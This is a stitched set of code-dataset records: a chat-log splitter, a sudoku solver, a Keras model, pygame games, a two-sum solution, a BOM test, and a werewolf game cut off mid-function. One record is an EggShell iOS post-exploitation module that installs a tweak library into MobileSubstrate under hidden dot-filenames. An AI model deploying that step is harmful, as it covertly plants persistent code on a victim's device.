'chat_zh.txt'\n\ndef detectCode(file):\n data = file.read()\n dicts = chardet.detect(data)\n return dicts[\"encoding\"]\n\ndef transform_text(text):\n \"\"\"特殊字符转换\"\"\"\n str_tf = {\n \"#E-s[数字x]\": \"(微笑)\",\n \"#E-j[数字x]\": \"(愤怒)\",\n \" \": \" \",\n \n }\n # \"[数字x]%\": \"(比例)\",\n # \"[金额x]%\": \"(比例)\",\n # \"%\": \" \",\n # \"#\": \" \",\n # \"&\": \" \",\n for k, v in str_tf.items():\n text = text.replace(k, v)\n return text\n\ndef read_old():\n with open(filePath,'rb') as file:\n print(file.read().decode('GB2312'))\n\ndef split_session(file,file_new):\n \"\"\"分割会话\"\"\"\n # gb18030\n line = file.readline().decode('gb18030')\n line_new = transform_text(line)\n session_id = line_new[:line_new.find('\\t')]\n # session_id = line[:line.find('\\t')]\n index = 0\n\n session_line = 'session:' + str(index) + '\\n\\n'\n print(session_line)\n file_new.write(session_line)\n \n while line:\n tmp = line_new[:line_new.find('\\t')]\n # tmp = line[:line.find('\\t')]\n if tmp != session_id:\n session_id = tmp\n index += 1\n session_line = '\\nsession:' + str(index) + '\\n\\n'\n print(session_line)\n file_new.write(session_line)\n \n print(line_new)\n file_new.write(line_new)\n line = file.readline().decode('gb18030')\n line_new = transform_text(line)\n\nfile = open(filePath,'rb')\nfile_new = open(filePath_new,'r+')\n\n# split_session(file,file_new)\n\n# encode = detectCode(file)\n# read_old()\nsplit_session(file,file_new)\n\nfile.close()\nfile_new.close()\n\n# 32\n# print(len(\"00029c51f92e8f34250d6af329c9a8df\"))\n# print(len(\"0006f1fe48ba77fa7f42b0acab6e2fad\"))","sub_path":"拆分会话/splitSession.py","file_name":"splitSession.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"201103335","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom sudoku.dados import *\nimport bisect\nimport threading\nimport math\n\nTENTATIVAS = 10000\n\n\ndef scale_value(x, minimo=0, maximo=math.e):\n return (x - minimo) / (maximo - minimo)\n\n\ndef transf_e(x):\n return math.e ** x\n\n\ndef tempera(x):\n return scale_value(transf_e(1 - x))\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\n\nclass FilaPrioridadeLimitada():\n def __init__(self, maxsize):\n self.queue = []\n self.mutex = threading.Lock()\n self.maxsize = maxsize\n\n def __len__(self):\n return len(self.queue)\n\n def put(self, item):\n self.mutex.acquire()\n if len(self.queue) == self.maxsize:\n self.queue = self.queue[:-1]\n\n bisect.insort(self.queue, item)\n self.mutex.release()\n\n def get(self):\n self.mutex.acquire()\n item = self.queue.pop(0)\n self.mutex.release()\n return item\n\n def getAll(self):\n return [item for item in self.queue]\n\n def last(self):\n self.mutex.acquire()\n last = self.queue[-1]\n self.mutex.release()\n return last\n\n def removeRandom(self):\n self.mutex.acquire()\n value = self.queue[random.randrange(len(self.queue))]\n self.queue.remove(value)\n self.mutex.release()\n\n def removeLast(self):\n self.mutex.acquire()\n self.queue = self.queue[:-1]\n self.mutex.release()\n\n def removeAll(self):\n self.queue = []\n\n def __iter__(self):\n return self.queue.__iter__()\n\n\nclass Solver:\n def __init__(self, tabInicial, k):\n self.vizinhos = FilaPrioridadeLimitada(k)\n self.tabInicial = tabInicial\n self.k = k\n self.visitados = []\n self.countErrors = 0\n self.tentativas = 0\n import sys\n self.melhor = sys.maxsize\n self.contaMelhorSemProgredir = 0\n self.limite_estagnacao = 500\n self.porcentagem_limpa = 0.99\n self.porcentagem_novos = 0.01\n self.aleatoriedade = False\n self.considera_visitados = False\n self.file = open(\"melhores.csv\", \"w\")\n self.count_calc_fitness = 0\n\n # self.temperatura =\n\n ##INICIO ESTRATÉGIAS DE GERACAO DE VIZINHOS DESCARTADAS\n\n def checkVisitados(self, tab, lin, col):\n\n if tab.matriz in self.visitados:\n tab.unflip(lin, col)\n return False\n return True\n\n def dontCheckVisitados(self, tab, lin, col):\n return True\n\n def tryByFlip(self, tab, lin, col, vizinhosAtuais, checkVisitados=checkVisitados):\n tab.flip(lin, col)\n if not checkVisitados(self, tab, lin, col):\n return\n fitness = tab.countInvalidos()\n try:\n if fitness < vizinhosAtuais[-1].getFitness():\n novoTab = tab.clone()\n novoTab.setFitness(fitness)\n self.vizinhos.put(novoTab)\n self.visitados.append(copy.deepcopy(novoTab.matriz))\n except IndexError:\n self.countErrors += 1\n print(\"erro\")\n finally:\n tab.unflip(lin, col)\n\n def proximos_vizinhos_fliptodos(self, tab, vizinhosAtuais):\n\n for lin in range(9):\n for col in range(9):\n if (lin, col) not in tab.preenchidos:\n self.tryByFlip(tab, lin, col, vizinhosAtuais, \\\n self.checkVisitados if self.considera_visitados \\\n else self.dontCheckVisitados())\n\n def proximos_vizinhos_flip_um_por_linha_random(self, tab, vizinhosAtuais):\n for lin in range(9):\n\n col = random.randrange(0, 9)\n while (lin, col) in tab.preenchidos:\n col = random.randrange(0, 9)\n\n self.tryByFlip(tab, lin, col, vizinhosAtuais, \\\n self.checkVisitados if self.considera_visitados \\\n else self.dontCheckVisitados())\n\n def proximos_vizinhos_flip_random(self, tab, vizinhosAtuais):\n\n # for i in range(9):\n lin, col = (random.randrange(0, 9), random.randrange(0, 9))\n while (lin, col) in tab.preenchidos:\n col = random.randrange(0, 9)\n\n self.tryByFlip(tab, lin, col, vizinhosAtuais, \\\n self.checkVisitados if self.considera_visitados \\\n else self.dontCheckVisitados())\n\n def proximo_vizinhos_random_9(self, tab, vizinhosAtuais):\n for i in range(9):\n self.proximos_vizinhos_total_random(tab, vizinhosAtuais)\n\n ##FIM ESTRATÉGIAS DE GERACAO DE VIZINHOS DESCARTADAS\n\n\n\n def proximos_vizinhos_total_random(self, tab, vizinhosAtuais):\n\n # for i in range(9):\n lin, col = (random.randrange(0, 9), random.randrange(0, 9))\n while (lin, col) in tab.preenchidos:\n col = random.randrange(0, 9)\n\n randomnum = random.randrange(1, 10)\n anterior = tab[lin][col]\n tab[lin][col] = randomnum\n\n try:\n if self.considera_visitados and tab.matriz in self.visitados:\n tab[lin][col] = anterior\n return\n\n fitness = tab.countInvalidos() ##Função objetivo\n self.count_calc_fitness += 1\n\n if vizinhosAtuais[-1] and fitness < vizinhosAtuais[-1].getFitness():\n novoTab = tab.clone()\n novoTab.setFitness(fitness)\n tab[lin][col] = anterior\n if novoTab.matriz not in [tab.matriz for tab in self.vizinhos]:\n self.vizinhos.put(novoTab)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(novoTab.matriz))\n elif self.aleatoriedade and random.random() >= self.tentativas / TENTATIVAS:\n for i in range(int(self.k * self.porcentagem_novos)): self.vizinhos.removeRandom()\n for i in range(int(self.k * self.porcentagem_novos)):\n novoTab = tab.clone()\n novoTab.setFitness(fitness)\n self.vizinhos.put(novoTab)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(novoTab.matriz))\n\n # except IndexError: print(\"erro\")\n finally:\n tab[lin][col] = anterior\n\n def resolver_sudoku_paralelo(self, metodoVizinhos):\n self.preparacao_inicial()\n while True:\n\n melhor = self.vizinhos.get()\n if melhor.estahResolvido() or self.tentativas == TENTATIVAS:\n return melhor\n self.vizinhos.put(melhor)\n print(melhor.getFitness())\n\n vizinhosAtuais = self.resolver_parte1(melhor)\n\n threads = []\n for v in vizinhosAtuais:\n t = threading.Thread(target=metodoVizinhos, kwargs={\"tab\": v, \"vizinhosAtuais\": vizinhosAtuais})\n t.daemon = True\n t.start()\n threads.append(t)\n\n for t in threads:\n t.join()\n\n self.resolver_parte2()\n\n def resolver_parte1(self, melhor):\n\n if self.aleatoriedade:\n if melhor.getFitness() < self.melhor:\n self.melhor = melhor.getFitness()\n self.contaMelhorSemProgredir = 0\n else:\n self.contaMelhorSemProgredir += 1\n\n if self.contaMelhorSemProgredir > self.limite_estagnacao:\n for i in range(int(self.k * self.porcentagem_limpa)): self.vizinhos.removeRandom()\n for i in range(int(self.k * self.porcentagem_limpa)):\n\n estadoAleatorio = self.tabInicial.preencheAleatorio()\n if estadoAleatorio.matriz not in self.visitados:\n self.vizinhos.put(estadoAleatorio)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(estadoAleatorio.matriz))\n self.contaMelhorSemProgredir = 0\n\n vizinhosAtuais = self.vizinhos.getAll()\n return vizinhosAtuais\n\n def resolver_parte2(self):\n\n print(\"Num de visitados:\", len(self.visitados))\n print(\"Num de vizinhos:\", len(self.vizinhos))\n self.tentativas += 1\n print(self.tentativas)\n\n def preparacao_inicial(self):\n for i in range(self.k):\n estadoInicial = self.tabInicial.preencheAleatorio()\n self.vizinhos.put(estadoInicial)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(estadoInicial.matriz))\n\n self.tentativas = 0\n\n def resolver_sudoku_sequencial(self, metodoVizinhos):\n\n try:\n self.preparacao_inicial()\n while True:\n\n melhor = self.vizinhos.get()\n if melhor.estahResolvido() or self.tentativas == TENTATIVAS:\n self.file.write(str(melhor.getFitness()) + \"\\n\")\n return melhor\n self.vizinhos.put(melhor)\n print(melhor.getFitness())\n self.file.write(str(melhor.getFitness()) + \"\\n\")\n\n vizinhosAtuais = self.resolver_parte1(melhor)\n\n for v in vizinhosAtuais:\n metodoVizinhos(v, vizinhosAtuais)\n\n self.resolver_parte2()\n\n finally:\n self.file.close()\n\n\n##MAIN:\n\nopcao = int(input(\"Default [Estratégia 1] (1); Estratégia 3 (3); Estratégia 5 (5); Estratégia 7 (7); ou Customizado (10)? \"))\nif opcao == 1:\n # solver = Solver(Tabuleiro(TAB_FACIL, calcPreenchidos=True), 500)\n solver = Solver(TAB_TAREFA, 500)\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelif opcao == 3:\n solver = Solver(TAB_TAREFA, 500)\n solver.aleatoriedade = True\n solver.porcentagem_novos = 0.01\n solver.limite_estagnacao = TENTATIVAS+1\n solver.porcentagem_limpa = 0.0\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelif opcao == 5:\n solver = Solver(TAB_TAREFA, 500)\n solver.aleatoriedade = True\n solver.porcentagem_novos = 0.01\n solver.limite_estagnacao = 500\n solver.porcentagem_limpa = 0.998\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelif opcao == 7:\n solver = Solver(TAB_TAREFA, 500)\n solver.aleatoriedade = True\n solver.porcentagem_novos = 0.0\n solver.limite_estagnacao = 500\n solver.porcentagem_limpa = 0.998\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelse:\n k = int(input(\"Valor do k: \"))\n # solver = Solver(Tabuleiro(TAB_FACIL, calcPreenchidos=True), k)\n solver = Solver(TAB_TAREFA, k)\n\n modos_execucao = [solver.resolver_sudoku_sequencial, solver.resolver_sudoku_paralelo]\n estrategias_vizinho = [solver.proximos_vizinhos_total_random, solver.proximos_vizinhos_fliptodos, \\\n solver.proximos_vizinhos_flip_um_por_linha_random, \\\n solver.proximos_vizinhos_flip_random]\n\n modo_exec = modos_execucao[int(input(\"Sequencial (1) ou Paralelo (2): \")) - 1]\n estrat_vizinho = estrategias_vizinho[\n int(input(\"Geração de vizinhos: Áleatório total (1), Flip todos (2), Flip um por linha (3), ou Flip Aleatório (4)? \")) - 1]\n TENTATIVAS = int(input(\"Quantas iterações: \"))\n\n solver.considera_visitados = True if int(input(\"Considera visitados (1) ou Não (2): \")) == 1 else False\n\n solver.aleatoriedade = True if int(input(\"Aleatoriedade (1) ou Não (2): \")) == 1 else False\n\n if solver.aleatoriedade:\n porcentagem_novos = float(input(\"Porcentagem de remoção na têmpera: \"))\n limite_estagnacao = int(input(\"Limite de estagnação: \"))\n porcentagem_limpa_estagnacao = float(input(\"Porcentagem de limpeza ao estagnar: \"))\n\n solver.porcentagem_limpa = porcentagem_limpa_estagnacao\n solver.limite_estagnacao = limite_estagnacao\n solver.porcentagem_novos = porcentagem_novos\n\n solucao = modo_exec(estrat_vizinho)\n\nsolucao.printthis()\nprint(solucao.fitness)\nprint(\"Avaliações de função objetivo =\", solver.count_calc_fitness)\n","sub_path":"sudoku/solver_com_saltos3.py","file_name":"solver_com_saltos3.py","file_ext":"py","file_size_in_byte":12245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"176632334","text":"class Order():\n filledqty = 0\n isAcked = False\n isOpen = True\n isRejected = False\n\n def __init__(self,id, side, ticker, orderqty, price):\n self.id = id\n self.ticker = ticker\n self.orderqty = int(orderqty)\n self.side = side\n self.price = price\n\n def __str__(self):\n return \"{0} {1} {2} {3} {4} {5} {6}\"\\\n .format(self.id, self.ticker, self.orderqty, self.side,\\\n self.price, self.isAcked,self.filledqty )\n\n def procExcutionReport(self, reportdict):\n reportType = reportdict[\"type\"]\n if reportType == \"ACK\":\n self.isAcked = True\n if reportType == \"FILL\":\n self.fill(reportdict[\"filled_shares\"])\n if reportType == \"REJ\":\n self.reject()\n\n def reject(self):\n self.isRejected = True\n self.isOpen = False\n\n def acked(self):\n self.acked = True\n\n def fill(self, fillqty):\n fillqty = int(fillqty)\n self.filledqty += fillqty\n if self.orderqty == self.filledqty:\n self.isOpen = False\n\n\n","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"323543606","text":"import numpy as np\nfrom icecream import ic\n\n# 1. 데이터\nx = np.array([range(100), range(301,401), range(1, 101),\n range(100), range(401,501)])\nx = np.transpose(x)\n\nic(x.shape)\ny = np.array([range(711, 811), range(101, 201)])\ny = np.transpose(y)\nic(y.shape)\n\n# 2. 모델 구성\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Input\n\n# 함수형 모델은 좀 더 유연하게 변경이 가능하다. 시작점과 끝지점만 잡아주면 된다.\ninput1 = Input(shape=(5,))\ndense1 = Dense(3)(input1)\ndense2 = Dense(4)(dense1)\ndense3 = Dense(10)(dense2)\noutput1 = Dense(2)(dense3)\n\nmodel = Model(inputs=input1, outputs=output1)\n\n# Sequential 모델은 이후에 여러 모델을 엮을 필요가 있는 경우 한계가 있음\n# 단일 모델을 사용하는 경우 편리함\n# model = Sequential()\n# model.add(Dense(3, input_shape=(5,)))\n# model.add(Dense(4))\n# model.add(Dense(10))\n# model.add(Dense(2))\n\nmodel.summary()\n\n# 3. 컴파일, 훈련\n\n# 4. 평가 예측\n","sub_path":"keras/keras17-33/keras17_func1.py","file_name":"keras17_func1.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"297871695","text":"backgroundpic=\"space.jpg\"\ncursorpic=\"cursor.png\"\n\nimport pygame\nimport sys\nfrom pygame.locals import *\n\npygame.init()\n\nscreen=pygame.display.set_mode((758,530),0,32)\n\nbackground=pygame.image.load(backgroundpic).convert()\ncursor=pygame.image.load(cursorpic).convert_alpha()\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.quit()\n\n\tscreen.blit(background, (0,0))\n\tx,y=pygame.mouse.get_pos()\n#\tx -= cursor.get_width()\n#\ty -= cursor.get_height()\n\t\n\tscreen.blit(cursor, (x,y))\n\t\n\tpygame.display.update()","sub_path":"PYTHON GAME.py","file_name":"PYTHON GAME.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"551995592","text":"class payload:\n def __init__(self):\n self.name = \"installpro\"\n self.description = \"installs eggshell tweak library\"\n self.type = \"native\"\n self.id = 126\n\n def run(self,conn,server,command):\n server.uploadFile(\"src/binaries/eggshellPro.dylib\",\"/Library/MobileSubstrate/DynamicLibraries/.espro.dylib\",conn)\n server.uploadFile(\"src/binaries/eggshellPro.plist\",\"/Library/MobileSubstrate/DynamicLibraries/.espro.plist\",conn)\n return \"respring\"\n","sub_path":"modules/commands/iOS/ios_installpro.py","file_name":"ios_installpro.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"541848596","text":"#License MIT 2016 Ahmad Retha\r\n\r\nimport pygame\r\n\r\npygame.init()\r\nWIDTH = 1366\r\nHEIGHT = 720\r\nSCREEN_SIZE = (WIDTH, HEIGHT)\r\nscreen = pygame.display.set_mode(SCREEN_SIZE)\r\nscreen = pygame.display.set_mode(SCREEN_SIZE , pygame.RESIZABLE)\r\n\r\n\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, image_file, location):\r\n pygame.sprite.Sprite.__init__(self) #call Sprite initializer\r\n self.image = pygame.image.load(image_file).convert_alpha()\r\n self.rect = self.image.get_rect()\r\n self.rect.left, self.rect.top = location\r\n \r\nBackGround = Background('background.png', [0,0]) \r\n\r\n##\r\n# Game mode\r\n#\r\n\r\n\r\n\r\npygame.display.set_caption('Air-Hockey')\r\nclock = pygame.time.Clock()\r\npygame.key.set_repeat(50, 50)\r\npygame.init()\r\nFSC = False\r\nx_thresh = 20\r\ny_thresh = 28\r\n\r\n\r\n\r\n##\r\n# Game consts\r\n#\r\nFONT = pygame.font.Font(None, 120)\r\nFONT1 = pygame.font.Font(None, 30)\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0 ,0, 255)\r\nlight_blue = (0,100,200)\r\nGRAY = (100, 100, 100)\r\nMODE_PLAY = 1\r\nMODE_QUIT = 0\r\nGame = 'stop'\r\nFRAME_RATE = 120\r\n\r\n##\r\n# Game Vars\r\n#\r\nPLAY_AREA_COLOR = (120,50,120)\r\nPLAY_AREA_WIDTH = 50\r\nPLAY_AREA_LEFT_X = 0\r\nPLAY_AREA_RIGHT_X = WIDTH - PLAY_AREA_WIDTH\r\nPLAY_AREA_LEFT_Y = 0\r\nPLAY_AREA_RIGHT_Y = 0\r\nPLAY_AREA_HEIGHT = HEIGHT\r\nscore_left = 0\r\nscore_right = 0\r\ncurrent_mode = MODE_PLAY\r\nBALL_SPEED = 4\r\npos_x = int(0.5 * WIDTH) \r\nspeed_x = BALL_SPEED\r\npos_y = int(0.5 * HEIGHT)\r\nspeed_y = BALL_SPEED\r\nBALL_COLOR = WHITE\r\nBALL_RADIUS = 18\r\nPADDLE_SPEED = 10\r\nPADDLE_HEIGHT = 100\r\nPADDLE_WIDTH = 25\r\nPADDLE_LEFT_COLOR = WHITE\r\nPADDLE_RIGHT_COLOR = WHITE\r\nPADDLE_LEFT_X = int(0.5*PADDLE_WIDTH) + x_thresh\r\nPADDLE_RIGHT_X = WIDTH - int(0.5*PADDLE_WIDTH) - PADDLE_WIDTH - x_thresh\r\npaddle_left_y = int(0.5 * HEIGHT - 0.5 * PADDLE_HEIGHT)\r\npaddle_right_y = paddle_left_y\r\n\r\n\r\n##\r\n# Game loop\r\n#\r\nwhile current_mode == MODE_PLAY:\r\n ##\r\n # Handle keyboard\r\n #\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n current_mode = MODE_QUIT\r\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n current_mode = MODE_QUIT\r\n\r\n keysPressed = pygame.key.get_pressed()\r\n if keysPressed[pygame.K_UP]:\r\n paddle_right_y = paddle_right_y - PADDLE_SPEED\r\n if paddle_right_y < y_thresh:\r\n paddle_right_y = y_thresh\r\n elif keysPressed[pygame.K_DOWN]:\r\n paddle_right_y = paddle_right_y + PADDLE_SPEED\r\n if paddle_right_y > (HEIGHT - PADDLE_HEIGHT - y_thresh):\r\n paddle_right_y = HEIGHT - PADDLE_HEIGHT - y_thresh/2-19\r\n if keysPressed[pygame.K_a]:\r\n paddle_left_y = paddle_left_y - PADDLE_SPEED\r\n if paddle_left_y < y_thresh:\r\n paddle_left_y = y_thresh\r\n elif keysPressed[pygame.K_z]:\r\n paddle_left_y = paddle_left_y + PADDLE_SPEED\r\n if paddle_left_y > (HEIGHT - PADDLE_HEIGHT - y_thresh):\r\n paddle_left_y = HEIGHT - PADDLE_HEIGHT - y_thresh/2-19\r\n elif keysPressed[pygame.K_F11]:\r\n if(FSC):\r\n screen = pygame.display.set_mode(SCREEN_SIZE , pygame.RESIZABLE)\r\n FSC=False\r\n else:\r\n screen = pygame.display.set_mode(SCREEN_SIZE, pygame.FULLSCREEN)\r\n FSC=True\r\n elif keysPressed[pygame.K_F1]:\r\n if(Game!='over'):\r\n Game='start'\r\n score_left = 0\r\n score_right = 0\r\n elif keysPressed[pygame.K_F2]:\r\n Game='stop'\r\n score_left = 0\r\n score_right = 0 \r\n \r\n \r\n \r\n\r\n ##\r\n # Draw arena and score\r\n #\r\n# screen.fill(BLACK)\r\n screen.fill([255, 255, 255])\r\n screen.blit(BackGround.image, BackGround.rect)\r\n# pygame.draw.line(screen, GRAY, [int(0.5 * WIDTH), 0], [int(0.5 * WIDTH), HEIGHT], 1)\r\n text = FONT.render(\"%2s %2s\" % (str(score_left), str(score_right)), 5, light_blue)\r\n textpos = text.get_rect(center = (WIDTH/2 - 10, 60))\r\n screen.blit(text, textpos)\r\n text1 = FONT1.render(\"F1 : Play\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 100))\r\n screen.blit(text1, textpos1)\r\n text1 = FONT1.render(\"F2 : Restart\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 150))\r\n screen.blit(text1, textpos1)\r\n text1 = FONT1.render(\"F11 : FullScreen\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 200))\r\n screen.blit(text1, textpos1)\r\n text1 = FONT1.render(\"Esc : Exit\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 250))\r\n screen.blit(text1, textpos1)\r\n\r\n ##\r\n # Draw paddles\r\n #\r\n pygame.draw.rect(screen, PADDLE_LEFT_COLOR, (PADDLE_LEFT_X, paddle_left_y, PADDLE_WIDTH, PADDLE_HEIGHT))\r\n pygame.draw.rect(screen, PADDLE_RIGHT_COLOR, (PADDLE_RIGHT_X, paddle_right_y, PADDLE_WIDTH, PADDLE_HEIGHT))\r\n\r\n ##\r\n # Draw play area\r\n #\r\n# pygame.draw.rect(screen, PLAY_AREA_COLOR, (PLAY_AREA_LEFT_X, PLAY_AREA_LEFT_Y, PLAY_AREA_WIDTH, PLAY_AREA_HEIGHT))\r\n# pygame.draw.rect(screen, PLAY_AREA_COLOR, (PLAY_AREA_RIGHT_X, PLAY_AREA_RIGHT_Y, PLAY_AREA_WIDTH, PLAY_AREA_HEIGHT))\r\n \r\n\r\n ##\r\n # Move ball and update scores\r\n #\r\n\r\n if(score_right==1000 or score_left==1000):\r\n Game='over'\r\n\r\n\r\n if(Game=='over'):\r\n FONT2 = pygame.font.Font(None, 80)\r\n text2 = FONT2.render(\"Game Over\", 2, (200,0,0))\r\n textpos2 = text.get_rect(centerx=WIDTH/2-88,centery=HEIGHT/2)\r\n screen.blit(text2, textpos2)\r\n FONT2 = pygame.font.Font(None, 50)\r\n a=0\r\n if(score_right>score_left):\r\n a=1\r\n if(a==1):\r\n text2 = FONT2.render(\"You Lose You Win\", 2, (200,0,0))\r\n textpos2 = text.get_rect(centerx=WIDTH/2-140, centery=HEIGHT/2+120)\r\n screen.blit(text2, textpos2)\r\n if(a==0):\r\n text2 = FONT2.render(\"You Win You Lose\", 2, (200,0,0))\r\n textpos2 = text.get_rect(centerx=WIDTH/2-140, centery=HEIGHT/2+120)\r\n screen.blit(text2, textpos2) \r\n \r\n \r\n else: \r\n if(Game=='start'):\r\n r = BALL_RADIUS\r\n pos_x = pos_x + speed_x\r\n \r\n if pos_x > WIDTH - x_thresh - 13:\r\n if pos_y >= 240 and pos_y<=480:\r\n if pos_y > (0.5 * HEIGHT):\r\n speed_y = abs(speed_y)\r\n else:\r\n speed_y = -abs(speed_y)\r\n pos_x = int(0.5 * WIDTH)\r\n pos_y = int(0.5 * HEIGHT)\r\n score_left += 1\r\n else: \r\n pos_x = WIDTH - x_thresh - r - 20\r\n speed_x = -speed_x\r\n \r\n \r\n elif pos_x < x_thresh+20:\r\n if pos_y >= 240 and pos_y <= 480:\r\n if pos_y > (0.5 * HEIGHT):\r\n speed_y = abs(speed_y)\r\n else:\r\n speed_y = -abs(speed_y)\r\n pos_x = int(0.5 * WIDTH)\r\n pos_y = int(0.5 * HEIGHT)\r\n score_right += 1\r\n else: \r\n pos_x = x_thresh+20\r\n speed_x = abs(speed_x)\r\n \r\n pos_y = pos_y + speed_y\r\n \r\n if pos_y + r > HEIGHT - y_thresh:\r\n speed_y = -speed_y\r\n elif pos_y - r < y_thresh:\r\n speed_y = abs(speed_y)\r\n \r\n \r\n if pos_x <= (PADDLE_LEFT_X + PADDLE_WIDTH)+r and pos_y >= paddle_left_y and pos_y <= (paddle_left_y + PADDLE_HEIGHT):\r\n pos_x = PADDLE_LEFT_X + PADDLE_WIDTH + r\r\n speed_x = abs(speed_x)\r\n elif pos_x >= PADDLE_RIGHT_X-r and pos_y >= paddle_right_y and pos_y <= (paddle_right_y + PADDLE_HEIGHT):\r\n pos_x = PADDLE_RIGHT_X-r\r\n speed_x = -speed_x \r\n\r\n if(Game=='stop'):\r\n paddle_left_y = int(0.5 * HEIGHT - 0.5 * PADDLE_HEIGHT)\r\n paddle_right_y = paddle_left_y\r\n pos_x = int(0.5 * WIDTH)\r\n pos_y = int(0.5 * HEIGHT)\r\n \r\n pygame.draw.circle(screen, BALL_COLOR, [pos_x, pos_y], BALL_RADIUS)\r\n\r\n ##\r\n # Bounce ball off paddles\r\n #\r\n\r\n\r\n ##\r\n # Tick-tock\r\n #\r\n pygame.display.update()\r\n clock.tick(FRAME_RATE)\r\n\r\npygame.quit()\r\n","sub_path":"pong_updated_better.py","file_name":"pong_updated_better.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"114585812","text":"\"\"\"\n两数之和\n\"\"\" \n#\n# @lc app=leetcode.cn id=1 lang=python3\n#\n# [1] 两数之和\n# 1. 使用哈希表,遍历nums\n# 2. if target - num not in hashmap --> hashmap[num] = index\n\n\n# @lc code=start\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # def twoSum(self, nums, target):\n hashmap = {}\n for index, num in enumerate(nums): \n if target - num in hashmap:\n return [hashmap[target - num], index]\n else:\n hashmap[num] = index\n print(hashmap)\n\n# @lc code=end","sub_path":"Week_02/G20200343040294/LeetCode_1_0294.py","file_name":"LeetCode_1_0294.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"521143949","text":"import pathlib\nfrom unittest import TestCase\nfrom mdbom.bom.npm import NpmProcessor\n\n\nclass TestProcessor(TestCase):\n\n input_dir = pathlib.Path.cwd() / \"tests\" / \"inputs\"\n\n def test_construct_npm_urls_success(self):\n proc = NpmProcessor()\n packages = proc.get_packages_from_bom(\n filename=self.input_dir / \"bom-npm.json\"\n )\n packages = proc.construct_urls(packages=packages)\n self.assertEqual(\"eslint\", packages[0].name)\n self.assertEqual(\"MIT\", packages[0].licenses)\n self.assertEqual(\"library\", packages[0].kind)\n self.assertEqual(\"7.27.0\", packages[0].version)\n self.assertEqual(\n \"https://www.npmjs.com/package/eslint/v/7.27.0\", packages[0].url\n )\n","sub_path":"tests/bom/test_npm.py","file_name":"test_npm.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"351907607","text":"import random\nimport socket\n\nclass Werewolf:\n\n def __init__(self, player):\n self.userId = player # Passing player's username\n self.userChar = None # Player's character\n self.werewolfId = None\n self.characterList = None\n self.playerControl = None\n self.votingControl = None\n self.victimId = None\n self.victimChar = None\n self.dayNightControl = 0\n\n def controlList(self):\n\n charLst = [\"villager2\", \"villager0\", \"werewolf\", \"villager1\"]\n userLst = [\"player0\", \"player1\", \"player2\", \"player3\"]\n voteCounter = 0\n\n # Setting playerControl list\n random.shuffle(charLst)\n lst1 = {charLst[i]: userLst[i] for i in range(len(charLst))}\n self.playerControl = lst1\n\n # Setting votingControl list\n lst2 = dict.fromkeys(userLst, voteCounter)\n self.votingControl = lst2\n\n # Getting player's character\n for char, userName in self.playerControl.items():\n if self.userId == userName:\n self.userChar = char\n break\n\n # Getting werewolf playerID\n self.werewolfId = self.playerControl['werewolf']\n\n def playingOrNot(self):\n\n print('''Once upon a time in the remote village, where life is very peaceful. Until one\n day, an evil force suddenly appeared - THE WEREWOLF. The life in the village has \n changed upside down since then. This creature is very cunning: On the day they \n disguise as people, and when the moonlight rises, they show their true color and \n begin to kill the villagers. The lives of the villagers become more stressful \n than ever by the worries, doubts, fear of each other.\\n To solve the situation, \n the villagers meet up to discuss and find out who is the werewolf. The trial is \n taking place in the morning. The most convicted of the villagers will be \n executed, regardless of whether they are a werewolf. Good Luck!''')\n\n select = input(\">> Do you want to play? (y/n) \")\n\n if select == 'y':\n print(\"You are {0} - {1}\".format(self.userId, self.userChar))\n self.checkingMode()\n else:\n print(\"Exit the game!\")\n return\n\n def checkingMode(self):\n\n if self.dayNightControl == 0:\n self.nightMode()\n else:\n self.dayMode()\n\n def nightMode(self):\n print(\"--------NIGHT MODE--------\")\n\n # If user is 